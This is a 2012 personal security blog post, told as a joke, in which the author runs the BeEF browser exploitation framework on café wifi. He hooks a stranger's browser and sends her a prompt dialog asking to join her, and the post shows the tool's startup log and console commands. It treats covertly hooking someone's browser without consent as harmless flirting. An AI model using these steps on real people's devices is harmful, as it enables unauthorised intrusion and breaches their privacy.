Information Security

Blogroll

AMol NAik
Andrew Case
Andre M. DiMino
Attila Axt
Bruce Schneier
Didier Stevens
Eric Romang
Francois Ropert
Gal Badishi
Gianluca Brindisi
Haroon Meer
Krzysztof Kotowicz
Lvdeijk
Michael Ligh
Mila Parkour
Miroslav Stampar
Pedro Vilaca
Rich Lundeen
Rob Fuller

Creative Commons License


Best view with Chromium devel without JavaScript enabled

9th September 2012

Post with 1 note

How Hackers Impress The Girls xD

Based on true story

One of many examples

you are in cafe with public wifi

% ./beef
[11:06:55][*] Browser Exploitation Framework (BeEF)
[11:06:55]    |   Version 0.4.3.7-alpha
[11:06:55]    |   Website http://beefproject.com
[11:06:55]    |   Run ‘beef -h’ for basic help.
[11:06:55]    |_  Run ‘git pull’ to update to the latest revision.
[11:06:55][*] Successful connection with Metasploit.
[11:06:56][*] Loaded 204 Metasploit exploits.
[11:06:56][*] BeEF is loading. Wait a few seconds…
[11:06:56][*] 6 extensions loaded:
[11:06:56]    |   Console
[11:06:56]    |   Custom Hook Point with iFrame Impersonation
[11:06:56]    |   QR Code Generator
[11:06:56]    |   Evasion
[11:06:56]    |   Metasploit
[11:06:56]    |_  Social Engineering
[11:06:56][*] 330 modules enabled.
[11:06:56][*] 2 network interfaces were detected.
[11:06:56][+] running on network interface: 127.0.0.1
[11:06:56]    |   Hook URL: http://127.0.0.1:3001/jahat.js
[11:06:56]    |_  UI URL:   http://127.0.0.1:3001/ui/panel
[11:06:56][+] running on network interface: 192.168.56.117
[11:06:56]    |   Hook URL: http://192.168.56.117:3001/jahat.js
[11:06:56]    |_  UI URL:   http://192.168.56.117:3001/ui/panel
[11:06:56][*] RESTful API key: 16c52b6803c0fc7d5220a523ed0ad37f4e651bea
[11:06:56][+] Successfully mounted a custom hook point
[11:06:56]    |   Mount Point: /lala
[11:06:56]    |_  Loading iFrame: http://192.168.56.117
[11:06:56][+] QRCode images available for interface: 127.0.0.1
[11:06:56]    |_  https://chart.googleapis.com/chart?cht=qr&chs=300x300&chl=http%3A%2F%2F127.0.0.1%3A3001%2Flala
[11:06:56][+] QRCode images available for interface: 192.168.56.117
[11:06:56]    |_  https://chart.googleapis.com/chart?cht=qr&chs=300x300&chl=http%3A%2F%2F192.168.56.117%3A3001%2Flala

yeah,using beef

BeEF (192.168.56.132) [1] / Create Prompt Dialog > param question “sorry ganggu,ini yang di meja ujung pake laptop putih..boleh gabung gak?”
BeEF (192.168.56.132) [1] / Create Prompt Dialog > execute
[*] Command successfully queued

English : “sorry annoying,i’m the guy with white laptop..may i join?”

give smile to her

watch the log

[11:09:18][*] Hooked browser [id:1, ip:192.168.56.132] has been sent instructions from command module ‘Create Prompt Dialog’
[11:09:41][*] Hooked browser [id:1, ip:192.168.56.132] has executed instructions from command module ‘Create Prompt Dialog’

she reply your smile

BeEF (192.168.56.132) [1] / Create Prompt Dialog > response 1
Results retrieved: 2012-09-09 11:09:41 +0700

Response:
answer=boleh

English : sure

what you waiting for ? get closer to her,use your social engineering skills..

unhook her from your beef,don’t be evil..

End of Story

i’m going crazy for a while

Tagged: Social Engineering

() 

ABOUT THE AUTHOR
            
Teguh is an idealist pwner living encrypted in Indonesia.
He is passionate about security and currently defeating the CWE top 25.
He also can be found on Google+, Twitter, GitHub, Shelfari and your libc.
  1. egeektronic posted this